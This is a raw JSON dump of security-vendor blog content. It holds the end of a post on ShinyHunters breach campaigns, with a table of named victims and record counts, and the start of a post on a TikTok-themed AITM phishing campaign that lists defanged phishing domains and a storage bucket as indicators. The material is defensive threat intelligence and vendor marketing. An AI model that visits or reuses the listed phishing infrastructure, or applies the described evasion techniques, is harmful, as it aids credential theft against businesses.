kit-specific signatures. Second, Push provides an additional layer of protection on the legitimate device code authentication pages themselves, preventing users from entering attacker-supplied codes into them. Together, these detections cover both the kit-operated phishing infrastructure and the legitimate auth pages that the attack flow depends on.",{"data":17669,"content":17670,"nodeType":860},{},[17671,17676],{"data":17672,"marks":17673,"value":17675,"nodeType":864},{},[17674],{"type":899},"For OAuth supply chain attacks,",{"data":17677,"marks":17678,"value":17679,"nodeType":864},{},[]," Push's detects and controls OAuth consent flows at the browser layer — capturing which application is requesting access, what scopes it's requesting, and whether the grant should be permitted under organizational policy. Push customers can also block OAuth connection requests as they transit the browser, enabling security teams to stop unwanted integrations being added in the first place. ",{"data":17681,"content":17682,"nodeType":860},{},[17683,17688],{"data":17684,"marks":17685,"value":17687,"nodeType":864},{},[17686],{"type":899},"For the infostealer credential playbook,",{"data":17689,"marks":17690,"value":17691,"nodeType":864},{},[]," Push's stolen credential detection identifies when employees are using credentials that have appeared in breach datasets or dark web feeds — catching the moment a dormant infostealer credential surfaces at a browser-based login, as well as surfacing insecure login methods missing mitigating controls like MFA and enforcing them through in-browser guardrails. And on the supply side, Push's ClickFix detection addresses the browser-based delivery vector that is now the primary method for distributing infostealer malware in the first place.",{"data":17693,"content":17694,"nodeType":860},{},[17695,17698,17705],{"data":17696,"marks":17697,"value":21,"nodeType":864},{},[],{"data":17699,"content":17700,"nodeType":883},{"uri":12922},[17701],{"data":17702,"marks":17703,"value":17704,"nodeType":864},{},[],"Learn more about how you can use Push controls to protect your users from in-browser threats here. ",{"data":17706,"marks":17707,"value":21,"nodeType":864},{},[],{"data":17709,"content":17710,"nodeType":1312},{},[17711],{"data":17712,"marks":17713,"value":17715,"nodeType":864},{},[17714],{"type":899},"Closing thoughts",{"data":17717,"content":17718,"nodeType":860},{},[17719],{"data":17720,"marks":17721,"value":17722,"nodeType":864},{},[],"The campaigns documented in this post are not historical — they are ongoing, with new victims surfacing weekly and the underlying criminal infrastructure still actively developing. But the defensive strategy does not require anticipating which specific group, vector, or target sector comes next, because all of them converge on the same control point: the browser, where the attack begins or the integration decision is made. Organizations with browser-layer detection and OAuth governance in place have defense-in-depth against the full range of techniques these groups employ, regardless of which specific vector any given campaign uses.",{"data":17724,"content":17725,"nodeType":1005},{},[],{"data":17727,"content":17728,"nodeType":860},{},[17729],{"data":17730,"marks":17731,"value":4855,"nodeType":864},{},[],{"data":17733,"content":17734,"nodeType":860},{},[17735],{"data":17736,"marks":17737,"value":1689,"nodeType":864},{},[],{"data":17739,"content":17740,"nodeType":860},{},[17741,17744,17750],{"data":17742,"marks":17743,"value":21,"nodeType":864},{},[],{"data":17745,"content":17746,"nodeType":883},{"uri":5642},[17747],{"data":17748,"marks":17749,"value":1703,"nodeType":864},{},[],{"data":17751,"marks":17752,"value":21,"nodeType":864},{},[],{"data":17754,"content":17755,"nodeType":1005},{},[],{"data":17757,"content":17758,"nodeType":1009},{},[17759],{"data":17760,"marks":17761,"value":17763,"nodeType":864},{},[17762],{"type":899},"Appendix: named ShinyHunters victims since May 2025",{"data":17765,"content":17766,"nodeType":860},{},[17767,17771,17778],{"data":17768,"marks":17769,"value":17770,"nodeType":864},{},[],"To give an indication of the scale, the following table documents all publicly named victims attributed to ShinyHunters specifically since the Salesforce campaign began in May 2025. It is not exhaustive: ShinyHunters has claimed over 1,000 organizations in aggregate across its Salesforce campaigns alone, and many victims have not been publicly named. This list also doesn’t include the billion-plus records compromised in the 2024 Snowflake breaches. The major ransomware attacks executed against M&S, Co-op, and Jaguar Land Rover claimed by the ",{"data":17772,"content":17773,"nodeType":883},{"uri":6237},[17774],{"data":17775,"marks":17776,"value":17777,"nodeType":864},{},[],"Scattered Lapsus$ Hunters \"brand\"",{"data":17779,"marks":17780,"value":17781,"nodeType":864},{},[]," also aren't listed below. ",{"data":17783,"content":17784,"nodeType":4845},{},[17785,17832,17896,17944,17992],{"data":17786,"content":17787,"nodeType":4581},{},[17788,17799,17810,17821],{"data":17789,"content":17790,"nodeType":4569},{},[17791],{"data":17792,"content":17793,"nodeType":860},{},[17794],{"data":17795,"marks":17796,"value":17798,"nodeType":864},{},[17797],{"type":899},"Campaign",{"data":17800,"content":17801,"nodeType":4569},{},[17802],{"data":17803,"content":17804,"nodeType":860},{},[17805],{"data":17806,"marks":17807,"value":17809,"nodeType":864},{},[17808],{"type":899},"Began",{"data":17811,"content":17812,"nodeType":4569},{},[17813],{"data":17814,"content":17815,"nodeType":860},{},[17816],{"data":17817,"marks":17818,"value":17820,"nodeType":864},{},[17819],{"type":899},"Named victims",{"data":17822,"content":17823,"nodeType":4569},{},[17824],{"data":17825,"content":17826,"nodeType":860},{},[17827],{"data":17828,"marks":17829,"value":17831,"nodeType":864},{},[17830],{"type":899},"Confirmed impact",{"data":17833,"content":17834,"nodeType":4581},{},[17835,17859,17869,17879],{"data":17836,"content":17837,"nodeType":4569},{},[17838],{"data":17839,"content":17840,"nodeType":860},{},[17841,17846,17850,17855],{"data":17842,"marks":17843,"value":17845,"nodeType":864},{},[17844],{"type":899},"ShinyHunters Salesforce Vishing",{"data":17847,"marks":17848,"value":17849,"nodeType":864},{},[]," (vishing + device code phishing → Salesforce connected app authorization) \n\n& ",{"data":17851,"marks":17852,"value":17854,"nodeType":864},{},[17853],{"type":899},"Salesloft/Drift Supply Chain",{"data":17856,"marks":17857,"value":17858,"nodeType":864},{},[]," (stolen OAuth tokens → downstream Salesforce access)",{"data":17860,"content":17861,"nodeType":4569},{},[17862],{"data":17863,"content":17864,"nodeType":860},{},[17865],{"data":17866,"marks":17867,"value":17868,"nodeType":864},{},[],"May 2025",{"data":17870,"content":17871,"nodeType":4569},{},[17872],{"data":17873,"content":17874,"nodeType":860},{},[17875],{"data":17876,"marks":17877,"value":17878,"nodeType":864},{},[],"Coca-Cola Europacific Partners, Cisco, Qantas, LVMH, Adidas, Google, Chanel, Pandora, Allianz Life, Air France-KLM, Farmers Insurance, Workday, TransUnion, Stellantis, Kering, Odido, Hallmark, Salesloft (origin), Toast, Avalara, Fastly, Cato Networks, Cloudflare, Palo Alto Networks, Zscaler, Tenable, Elastic, JFrog, CyberArk, Rubrik, BeyondTrust, Proofpoint, Workiva, Mercer Advisors, Beacon Pointe, Ameriprise, Kemper, Udemy, 7-Eleven, Mytheresa, Marcus & Millichap, Carnival, Pitney Bowes, Alert 360, Amtrak, McGraw-Hill, Canada Life, Charter Communications",{"data":17880,"content":17881,"nodeType":4569},{},[17882,17889],{"data":17883,"content":17884,"nodeType":860},{},[17885],{"data":17886,"marks":17887,"value":17888,"nodeType":864},{},[],"49 named victims. Confirmed individual impact includes 23M+ records (Coca-Cola), 5.7M records (Qantas), 6.2M customers (Odido), 4.4M consumers (TransUnion), up to 18M records (Stellantis), 13.5M emails (McGraw-Hill), 8.2M emails (Pitney Bowes), 7.5M emails (Carnival), 7-Eleven: 185K confirmed by HIBP (SSNs, driver's licenses; franchisee data), Charter Communications: millions of records claimed (company disputes scope). ",{"data":17890,"content":17891,"nodeType":860},{},[17892],{"data":17893,"marks":17894,"value":17895,"nodeType":864},{},[],"ShinyHunters claims 1.5B+ Salesforce records across 1,000+ organizations total.",{"data":17897,"content":17898,"nodeType":4581},{},[17899,17914,17924,17934],{"data":17900,"content":17901,"nodeType":4569},{},[17902],{"data":17903,"content":17904,"nodeType":860},{},[17905,17910],{"data":17906,"marks":17907,"value":17909,"nodeType":864},{},[17908],{"type":899},"Vishing + AiTM SSO",{"data":17911,"marks":17912,"value":17913,"nodeType":864},{},[]," (vishing → AiTM phishing page → SSO session capture → SaaS data exfiltration)",{"data":17915,"content":17916,"nodeType":4569},{},[17917],{"data":17918,"content":17919,"nodeType":860},{},[17920],{"data":17921,"marks":17922,"value":17923,"nodeType":864},{},[],"Aug 2025",{"data":17925,"content":17926,"nodeType":4569},{},[17927],{"data":17928,"content":17929,"nodeType":860},{},[17930],{"data":17931,"marks":17932,"value":17933,"nodeType":864},{},[],"SoundCloud, GrubHub, Panera Bread, Match Group, Crunchbase, Betterment, CarMax, Edmunds, CarGurus, Hims & Hers, University of Pennsylvania, Harvard University, Optimizely, TELUS Digital, Crunchyroll, ADT",{"data":17935,"content":17936,"nodeType":4569},{},[17937],{"data":17938,"content":17939,"nodeType":860},{},[17940],{"data":17941,"marks":17942,"value":17943,"nodeType":864},{},[],"16 named victims. Confirmed individual impact includes ~30M records (SoundCloud), ~14M records (Panera), 10M+ records (Match Group), ~20M records (Betterment), 5.5M people (ADT), 1M+ records (UPenn), ~1PB stolen from TELUS Digital ($65M ransom refused).",{"data":17945,"content":17946,"nodeType":4581},{},[17947,17962,17972,17982],{"data":17948,"content":17949,"nodeType":4569},{},[17950],{"data":17951,"content":17952,"nodeType":860},{},[17953,17958],{"data":17954,"marks":17955,"value":17957,"nodeType":864},{},[17956],{"type":899},"Anodot Supply Chain",{"data":17959,"marks":17960,"value":17961,"nodeType":864},{},[]," (stolen OAuth tokens → downstream Snowflake/BigQuery access)",{"data":17963,"content":17964,"nodeType":4569},{},[17965],{"data":17966,"content":17967,"nodeType":860},{},[17968],{"data":17969,"marks":17970,"value":17971,"nodeType":864},{},[],"Apr 2026",{"data":17973,"content":17974,"nodeType":4569},{},[17975],{"data":17976,"content":17977,"nodeType":860},{},[17978],{"data":17979,"marks":17980,"value":17981,"nodeType":864},{},[],"Anodot/Glassbox (origin), Rockstar Games, Vimeo, Zara/Inditex",{"data":17983,"content":17984,"nodeType":4569},{},[17985],{"data":17986,"content":17987,"nodeType":860},{},[17988],{"data":17989,"marks":17990,"value":17991,"nodeType":864},{},[],"4 named victims (12+ total claimed). 78.6M records (Rockstar Games), 197K individuals (Zara), 119K individuals (Vimeo).",{"data":17993,"content":17994,"nodeType":4581},{},[17995,18010,18019,18029],{"data":17996,"content":17997,"nodeType":4569},{},[17998],{"data":17999,"content":18000,"nodeType":860},{},[18001,18006],{"data":18002,"marks":18003,"value":18005,"nodeType":864},{},[18004],{"type":899},"Other SLH-attributed",{"data":18007,"marks":18008,"value":18009,"nodeType":864},{},[]," (misc. vectors including infostealer chains, CI/CD supply chain, SaaS platform compromise)",{"data":18011,"content":18012,"nodeType":4569},{},[18013],{"data":18014,"content":18015,"nodeType":860},{},[18016],{"data":18017,"marks":18018,"value":17868,"nodeType":864},{},[],{"data":18020,"content":18021,"nodeType":4569},{},[18022],{"data":18023,"content":18024,"nodeType":860},{},[18025],{"data":18026,"marks":18027,"value":18028,"nodeType":864},{},[],"UK Legal Aid Agency, Mixpanel, Wynn Resorts, Woflow, Vercel, European Commission, Mercor, Medtronic, Instructure",{"data":18030,"content":18031,"nodeType":4569},{},[18032],{"data":18033,"content":18034,"nodeType":860},{},[18035],{"data":18036,"marks":18037,"value":18038,"nodeType":864},{},[],"10 named victims across varied vectors. Notable: Vercel (Lumma Stealer → Context.ai OAuth app → Google Workspace), European Commission (poisoned Trivy GitHub Action → 340GB across 71 EU entities)",{"data":18040,"content":18041,"nodeType":860},{},[18042],{"data":18043,"marks":18044,"value":21,"nodeType":864},{},[],"The three attack techniques behind ShinyHunters' 2026 campaigns ","ShinyHunters' breach of Instructure is the latest in a long series of attacks. Here's our view of the big picture. ","analyzing-the-instructure-breach",{"items":18049},[18050,18052],{"sys":18051,"name":6593},{"id":6592},{"sys":18053,"name":342},{"id":6596},{"items":18055},[18056],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":18057},{"url":2740},"7-things-we-learned-from-john-hammond","blog/7-things-we-learned-from-john-hammond",{"json":18061},{"data":18062,"content":18063,"nodeType":856},{},[18064],{"data":18065,"content":18066,"nodeType":860},{},[18067],{"data":18068,"marks":18069,"value":18070,"nodeType":864},{},[],"Luke Jennings (Push VP of Research) and John Hammond (Senior Principal Security Researcher, Huntress) walked through the browser-based attack techniques defining the 2026 threat landscape.","Here are 7 things we learned from our conversation with John Hammond on the \"Why the browser is the new battleground\" webinar. ",{"id":18073,"publishedAt":18074},"6V12IJexyAkFFVIrbwlNPq","2026-08-12T12:00:57.289Z",{"items":18076},[18077,18079],{"sys":18078,"name":6593},{"id":6592},{"sys":18080,"name":297},{"id":2732},{"items":18082},[18083,18085,18087,18089,18091,18093,18095,18097,18099,18101,18103,18105,18107,18109,18111,18113,18115,18117,18119,18121,18123,18125],{"sys":18084,"name":279,"slug":280,"tier":31},{"id":276},{"sys":18086,"name":519,"slug":520,"tier":31},{"id":516},{"sys":18088,"name":413,"slug":414,"tier":31},{"id":410},{"sys":18090,"name":297,"slug":298,"tier":31},{"id":294},{"sys":18092,"name":342,"slug":343,"tier":31},{"id":339},{"sys":18094,"name":235,"slug":236,"tier":31},{"id":232},{"sys":18096,"name":261,"slug":262,"tier":45},{"id":258},{"sys":18098,"name":315,"slug":316,"tier":45},{"id":312},{"sys":18100,"name":360,"slug":361,"tier":45},{"id":357},{"sys":18102,"name":484,"slug":485,"tier":45},{"id":481},{"sys":18104,"name":475,"slug":476,"tier":45},{"id":472},{"sys":18106,"name":511,"slug":512,"tier":45},{"id":508},{"sys":18108,"name":324,"slug":325,"tier":45},{"id":321},{"sys":18110,"name":571,"slug":572,"tier":45},{"id":568},{"sys":18112,"name":466,"slug":467,"tier":45},{"id":463},{"sys":18114,"name":440,"slug":441,"tier":45},{"id":437},{"sys":18116,"name":607,"slug":608,"tier":45},{"id":604},{"sys":18118,"name":377,"slug":378,"tier":45},{"id":374},{"sys":18120,"name":431,"slug":432,"tier":45},{"id":428},{"sys":18122,"name":448,"slug":449,"tier":45},{"id":445},{"sys":18124,"name":493,"slug":494,"tier":45},{"id":490},{"sys":18126,"name":244,"slug":245,"tier":45},{"id":241},"q4U5IPhRMZseIs6ceVJ_ZzUpucxUy-2TaBbYB9CbBVE",{"id":18129,"title":18130,"authorsCollection":18131,"content":18137,"extension":228,"faqItemsCollection":18811,"faqTitle":59,"featured":6,"hashTags":59,"meta":18813,"metaTitle":18814,"ogImage":59,"postType":5740,"publishedDate":18815,"relatedBlogPostsCollection":18816,"slug":21293,"stem":21294,"subtitle":59,"summary":21295,"synopsis":21306,"sys":21307,"tagsCollection":21310,"topicsCollection":21316,"__hash__":21344},"blog/blog/tiktok-phishing.json","Attackers are now targeting business TikTok accounts using session-stealing phishing kits",{"items":18132},[18133],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":18134,"profilePicture":18136},[18135],"https://www.linkedin.com/in/daniel-g-/",{"url":2740},{"json":18138,"links":18714},{"data":18139,"content":18140,"nodeType":856},{},[18141,18148,18168,18174,18177,18185,18192,18199,18206,18229,18236,18255,18262,18268,18276,18283,18289,18295,18301,18307,18313,18319,18325,18328,18336,18343,18350,18370,18415,18422,18464,18470,18473,18480,18497,18504,18616,18623,18636,18643,18646,18654,18660,18666,18702,18708],{"data":18142,"content":18143,"nodeType":860},{},[18144],{"data":18145,"marks":18146,"value":18147,"nodeType":864},{},[],"We recently detected and blocked a new style of phishing page targeting TikTok for Business accounts — used by company marketing teams to manage ad campaigns. ",{"data":18149,"content":18150,"nodeType":860},{},[18151,18155,18164],{"data":18152,"marks":18153,"value":18154,"nodeType":864},{},[],"On closer analysis, we identified a cluster of linked pages featuring both TikTok themes, and Google themed “Schedule a Call” imitation pages, ",{"data":18156,"content":18158,"nodeType":883},{"uri":18157},"https://sublime.security/blog/google-careers-impersonation-credential-phishing-scam-with-endless-variation/",[18159],{"data":18160,"marks":18161,"value":18163,"nodeType":864},{},[18162],{"type":1455},"similar to a campaign reported late last year",{"data":18165,"marks":18166,"value":18167,"nodeType":864},{},[],", suggesting a continuity of this previous campaign.",{"data":18169,"content":18173,"nodeType":996},{"target":18170},{"sys":18171},{"id":18172,"type":1001,"linkType":1002},"6mR622LOKuhGRfBXkIsUrx",[],{"data":18175,"content":18176,"nodeType":1005},{},[],{"data":18178,"content":18179,"nodeType":1009},{},[18180],{"data":18181,"marks":18182,"value":18184,"nodeType":864},{},[18183],{"type":899},"Campaign breakdown",{"data":18186,"content":18187,"nodeType":860},{},[18188],{"data":18189,"marks":18190,"value":18191,"nodeType":864},{},[],"Push researchers have identified a cluster of newly registered phishing pages all registered on the 24th March within a 9-second window. All of the pages are hosted behind Cloudflare with the same registrar (Nicenic International Group, commonly abused for bulk phishing domain registration). ",{"data":18193,"content":18194,"nodeType":860},{},[18195],{"data":18196,"marks":18197,"value":18198,"nodeType":864},{},[],"The pages feature a common naming convention, being various derivations of welcome.careers*[.]com. A full list of identified domains is provided later, but we expect this to grow significantly as the campaign ramps up. ",{"data":18200,"content":18201,"nodeType":860},{},[18202],{"data":18203,"marks":18204,"value":18205,"nodeType":864},{},[],"Victims are tricked into clicking a malicious link that takes them to one of two page styles. ",{"data":18207,"content":18208,"nodeType":941},{},[18209,18219],{"data":18210,"content":18211,"nodeType":945},{},[18212],{"data":18213,"content":18214,"nodeType":860},{},[18215],{"data":18216,"marks":18217,"value":18218,"nodeType":864},{},[],"A TikTok for Business cloned page ",{"data":18220,"content":18221,"nodeType":945},{},[18222],{"data":18223,"content":18224,"nodeType":860},{},[18225],{"data":18226,"marks":18227,"value":18228,"nodeType":864},{},[],"A Google careers “Schedule a call” cloned page",{"data":18230,"content":18231,"nodeType":860},{},[18232],{"data":18233,"marks":18234,"value":18235,"nodeType":864},{},[],"In both cases, the victim is required to complete a basic information form before being served with a malicious login page that is in fact fronting a reverse proxy AITM phishing kit. ",{"data":18237,"content":18238,"nodeType":860},{},[18239,18243,18251],{"data":18240,"marks":18241,"value":18242,"nodeType":864},{},[],"While Push has limited visibility of the initial delivery mechanism in this case, we can assume that a similar method of dynamically generated email is being used to the ",{"data":18244,"content":18245,"nodeType":883},{"uri":18157},[18246],{"data":18247,"marks":18248,"value":18250,"nodeType":864},{},[18249],{"type":1455},"previously identified campaign",{"data":18252,"marks":18253,"value":18254,"nodeType":864},{},[]," reported by Sublime in October, featuring a similar Google Careers cloned page. ",{"data":18256,"content":18257,"nodeType":860},{},[18258],{"data":18259,"marks":18260,"value":18261,"nodeType":864},{},[],"You can see an example of the page load below. ",{"data":18263,"content":18267,"nodeType":996},{"target":18264},{"sys":18265},{"id":18266,"type":1001,"linkType":1002},"3wjGpMs3qJsZaar2LIlQbE",[],{"data":18269,"content":18270,"nodeType":1312},{},[18271],{"data":18272,"marks":18273,"value":18275,"nodeType":864},{},[18274],{"type":899},"Attack flow",{"data":18277,"content":18278,"nodeType":860},{},[18279],{"data":18280,"marks":18281,"value":18282,"nodeType":864},{},[],"When the link is first clicked, the page is silently redirected from a legitimate Google Storage site before loading the page. A Cloudflare Turnstile check is used to prevent security bots from analyzing the page, before loading either a TikTok or Google themed page. Progressing through the forms ultimately serves up an AITM phishing page.",{"data":18284,"content":18288,"nodeType":996},{"target":18285},{"sys":18286},{"id":18287,"type":1001,"linkType":1002},"5zoUeGW0zlC7u9vtHolskM",[],{"data":18290,"content":18294,"nodeType":996},{"target":18291},{"sys":18292},{"id":18293,"type":1001,"linkType":1002},"7eyc9v7xVZzXK8jY53I9li",[],{"data":18296,"content":18300,"nodeType":996},{"target":18297},{"sys":18298},{"id":18299,"type":1001,"linkType":1002},"37kj78jit44Mp6LCi7tEsC",[],{"data":18302,"content":18306,"nodeType":996},{"target":18303},{"sys":18304},{"id":18305,"type":1001,"linkType":1002},"4qaPOlBYeIfEoG2OZvl8lI",[],{"data":18308,"content":18312,"nodeType":996},{"target":18309},{"sys":18310},{"id":18311,"type":1001,"linkType":1002},"7cIFMDwHF2R8vswtJzWdKn",[],{"data":18314,"content":18318,"nodeType":996},{"target":18315},{"sys":18316},{"id":18317,"type":1001,"linkType":1002},"5YtrhvypdLkcSUoj2IEj24",[],{"data":18320,"content":18324,"nodeType":996},{"target":18321},{"sys":18322},{"id":18323,"type":1001,"linkType":1002},"7cc4UclvVVW3YuUVB8PpJp",[],{"data":18326,"content":18327,"nodeType":1005},{},[],{"data":18329,"content":18330,"nodeType":1009},{},[18331],{"data":18332,"marks":18333,"value":18335,"nodeType":864},{},[18334],{"type":899},"Why TikTok???",{"data":18337,"content":18338,"nodeType":860},{},[18339],{"data":18340,"marks":18341,"value":18342,"nodeType":864},{},[],"Given that the majority of phishing pages intercepted by Push tend to replicate core SSO platforms like Google and Microsoft, targeting TikTok is a notable development, though not entirely uncommon. ",{"data":18344,"content":18345,"nodeType":860},{},[18346],{"data":18347,"marks":18348,"value":18349,"nodeType":864},{},[],"TikTok seems a weird choice at first glance. But it makes more sense when we consider that TikTok has been historically abused to distribute malicious links and social engineering instructions. ",{"data":18351,"content":18352,"nodeType":860},{},[18353,18357,18366],{"data":18354,"marks":18355,"value":18356,"nodeType":864},{},[],"This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut. They instructed viewers to open PowerShell and paste commands that downloaded infostealers from bulletproof hosting infrastructure. ",{"data":18358,"content":18360,"nodeType":883},{"uri":18359},"https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html",[18361],{"data":18362,"marks":18363,"value":18365,"nodeType":864},{},[18364],{"type":1455},"One video alone",{"data":18367,"marks":18368,"value":18369,"nodeType":864},{},[]," hit ~500,000 views and 20,000+ likes.",{"data":18371,"content":18372,"nodeType":860},{},[18373,18377,18386,18390,18399,18403,18411],{"data":18374,"marks":18375,"value":18376,"nodeType":864},{},[],"It’s also a common hunting ground for crypto scammers, like many other social platforms have historically been abused (most commonly Twitter/X). Many of these are done with the full knowledge and consent of “influencers”, but there are also overtly malicious examples such as ",{"data":18378,"content":18380,"nodeType":883},{"uri":18379},"https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-elon-musk-crypto-giveaway-scam-campaigns-run-rampant-on-tiktok",[18381],{"data":18382,"marks":18383,"value":18385,"nodeType":864},{},[18384],{"type":1455},"deepfaked videos of Elon Musk",{"data":18387,"marks":18388,"value":18389,"nodeType":864},{},[]," with overlaid AI-generated audio promoting fake exchanges. ",{"data":18391,"content":18393,"nodeType":883},{"uri":18392},"https://www.malwarebytes.com/blog/news/2025/10/tiktok-scam-sells-you-access-to-your-own-fake-money",[18394],{"data":18395,"marks":18396,"value":18398,"nodeType":864},{},[18397],{"type":1455},"TikTok DMs",{"data":18400,"marks":18401,"value":18402,"nodeType":864},{},[],", like ",{"data":18404,"content":18405,"nodeType":883},{"uri":12952},[18406],{"data":18407,"marks":18408,"value":18410,"nodeType":864},{},[18409],{"type":1455},"other social media apps",{"data":18412,"marks":18413,"value":18414,"nodeType":864},{},[],", are also a place where attackers can target victims. ",{"data":18416,"content":18417,"nodeType":860},{},[18418],{"data":18419,"marks":18420,"value":18421,"nodeType":864},{},[],"Ultimately, it’s easy to see how access to verified and trustworthy business accounts on TikTok could be abused in the wrong hands. ",{"data":18423,"content":18424,"nodeType":860},{},[18425,18429,18437,18441,18449,18453,18461],{"data":18426,"marks":18427,"value":18428,"nodeType":864},{},[],"It’s worth pointing out too that many/most business users will opt to “log in with Google.” This means that anyone using Google to login to their TikTok account will effectively have both accounts used to distribute ads compromised in one go, opening up the typical ",{"data":18430,"content":18431,"nodeType":883},{"uri":9013},[18432],{"data":18433,"marks":18434,"value":18436,"nodeType":864},{},[18435],{"type":1455},"Google Ad Manager exploitation playbook",{"data":18438,"marks":18439,"value":18440,"nodeType":864},{},[]," — as well as accessing any further apps accessible via SSO for data theft and extortion. This has become the standard MO for attackers, in campaigns such as the ",{"data":18442,"content":18443,"nodeType":883},{"uri":6259},[18444],{"data":18445,"marks":18446,"value":18448,"nodeType":864},{},[18447],{"type":1455},"Scattered Lapsus$ Hunters AITM phishing",{"data":18450,"marks":18451,"value":18452,"nodeType":864},{},[]," spree earlier this year, and their ",{"data":18454,"content":18455,"nodeType":883},{"uri":13645},[18456],{"data":18457,"marks":18458,"value":18460,"nodeType":864},{},[18459],{"type":1455},"recent spate of device code phishing attacks",{"data":18462,"marks":18463,"value":2924,"nodeType":864},{},[],{"data":18465,"content":18469,"nodeType":996},{"target":18466},{"sys":18467},{"id":18468,"type":1001,"linkType":1002},"4H3AzW7q4QBv7pJawSqQBJ",[],{"data":18471,"content":18472,"nodeType":1005},{},[],{"data":18474,"content":18475,"nodeType":1009},{},[18476],{"data":18477,"marks":18478,"value":5571,"nodeType":864},{},[18479],{"type":899},{"data":18481,"content":18482,"nodeType":860},{},[18483,18486,18493],{"data":18484,"marks":18485,"value":12615,"nodeType":864},{},[],{"data":18487,"content":18488,"nodeType":883},{"uri":7248},[18489],{"data":18490,"marks":18491,"value":7253,"nodeType":864},{},[18492],{"type":1455},{"data":18494,"marks":18495,"value":18496,"nodeType":864},{},[]," in the attack chain, often dynamically serving different URLs to site visitors. ",{"data":18498,"content":18499,"nodeType":860},{},[18500],{"data":18501,"marks":18502,"value":18503,"nodeType":864},{},[],"That said, the domains observed in the initial cluster were:",{"data":18505,"content":18506,"nodeType":941},{},[18507,18517,18527,18537,18547,18557,18567,18577,18587,18597,18607],{"data":18508,"content":18509,"nodeType":945},{},[18510],{"data":18511,"content":18512,"nodeType":860},{},[18513],{"data":18514,"marks":18515,"value":18516,"nodeType":864},{},[],"welcome.careerscrews[.]com",{"data":18518,"content":18519,"nodeType":945},{},[18520],{"data":18521,"content":18522,"nodeType":860},{},[18523],{"data":18524,"marks":18525,"value":18526,"nodeType":864},{},[],"welcome.careerstaffer[.]com",{"data":18528,"content":18529,"nodeType":945},{},[18530],{"data":18531,"content":18532,"nodeType":860},{},[18533],{"data":18534,"marks":18535,"value":18536,"nodeType":864},{},[],"welcome.careersworkflow[.]com",{"data":18538,"content":18539,"nodeType":945},{},[18540],{"data":18541,"content":18542,"nodeType":860},{},[18543],{"data":18544,"marks":18545,"value":18546,"nodeType":864},{},[],"welcome.careerstransform[.]com",{"data":18548,"content":18549,"nodeType":945},{},[18550],{"data":18551,"content":18552,"nodeType":860},{},[18553],{"data":18554,"marks":18555,"value":18556,"nodeType":864},{},[],"welcome.careersupskill[.]com",{"data":18558,"content":18559,"nodeType":945},{},[18560],{"data":18561,"content":18562,"nodeType":860},{},[18563],{"data":18564,"marks":18565,"value":18566,"nodeType":864},{},[],"welcome.careerssuccess[.]com",{"data":18568,"content":18569,"nodeType":945},{},[18570],{"data":18571,"content":18572,"nodeType":860},{},[18573],{"data":18574,"marks":18575,"value":18576,"nodeType":864},{},[],"welcome.careersstaffgrid[.]com",{"data":18578,"content":18579,"nodeType":945},{},[18580],{"data":18581,"content":18582,"nodeType":860},{},[18583],{"data":18584,"marks":18585,"value":18586,"nodeType":864},{},[],"welcome.careersprogress[.]com",{"data":18588,"content":18589,"nodeType":945},{},[18590],{"data":18591,"content":18592,"nodeType":860},{},[18593],{"data":18594,"marks":18595,"value":18596,"nodeType":864},{},[],"welcome.careersgrower[.]com",{"data":18598,"content":18599,"nodeType":945},{},[18600],{"data":18601,"content":18602,"nodeType":860},{},[18603],{"data":18604,"marks":18605,"value":18606,"nodeType":864},{},[],"welcome.careersengage[.]com",{"data":18608,"content":18609,"nodeType":945},{},[18610],{"data":18611,"content":18612,"nodeType":860},{},[18613],{"data":18614,"marks":18615,"value":18516,"nodeType":864},{},[],{"data":18617,"content":18618,"nodeType":860},{},[18619],{"data":18620,"marks":18621,"value":18622,"nodeType":864},{},[],"Since the pages are all hosted in a single Google Storage bucket, any linked pages/files should be considered to be malicious.",{"data":18624,"content":18625,"nodeType":941},{},[18626],{"data":18627,"content":18628,"nodeType":945},{},[18629],{"data":18630,"content":18631,"nodeType":860},{},[18632],{"data":18633,"marks":18634,"value":18635,"nodeType":864},{},[],"storage.googleapis[.]com/fiz2a4s014vt8q4l5i0m1m7b0gl/",{"data":18637,"content":18638,"nodeType":860},{},[18639],{"data":18640,"marks":18641,"value":7196,"nodeType":864},{},[18642],{"type":899},{"data":18644,"content":18645,"nodeType":1005},{},[],{"data":18647,"content":18648,"nodeType":1009},{},[18649],{"data":18650,"marks":18651,"value":18653,"nodeType":864},{},[18652],{"type":899},"About Push Security",{"data":18655,"content":18656,"nodeType":860},{},[18657],{"data":18658,"marks":18659,"value":10245,"nodeType":864},{},[],{"data":18661,"content":18662,"nodeType":860},{},[18663],{"data":18664,"marks":18665,"value":16307,"nodeType":864},{},[],{"data":18667,"content":18668,"nodeType":860},{},[18669,18672,18679,18682,18689,18692,18699],{"data":18670,"marks":18671,"value":16314,"nodeType":864},{},[],{"data":18673,"content":18674,"nodeType":883},{"uri":10269},[18675],{"data":18676,"marks":18677,"value":10275,"nodeType":864},{},[18678],{"type":1455},{"data":18680,"marks":18681,"value":3731,"nodeType":864},{},[],{"data":18683,"content":18684,"nodeType":883},{"uri":10281},[18685],{"data":18686,"marks":18687,"value":16332,"nodeType":864},{},[18688],{"type":1455},{"data":18690,"marks":18691,"value":10291,"nodeType":864},{},[],{"data":18693,"content":18694,"nodeType":883},{"uri":1700},[18695],{"data":18696,"marks":18697,"value":10299,"nodeType":864},{},[18698],{"type":1455},{"data":18700,"marks":18701,"value":2924,"nodeType":864},{},[],{"data":18703,"content":18707,"nodeType":996},{"target":18704},{"sys":18705},{"id":18706,"type":1001,"linkType":1002},"7ccfmP2yXXmtC1R5BLmKYg",[],{"data":18709,"content":18710,"nodeType":860},{},[18711],{"data":18712,"marks":18713,"value":21,"nodeType":864},{},[],{"entries":18715},{"hyperlink":18716,"inline":18717,"block":18718},[],[],[18719,18757,18763,18770,18776,18781,18787,18793,18799,18804,18808],{"sys":18720,"__typename":1740,"content":18721,"name":18756,"title":59},{"id":18172},{"json":18722},{"data":18723,"content":18724,"nodeType":856},{},[18725],{"data":18726,"content":18727,"nodeType":860},{},[18728,18732,18740,18744,18752],{"data":18729,"marks":18730,"value":18731,"nodeType":864},{},[],"We’ve 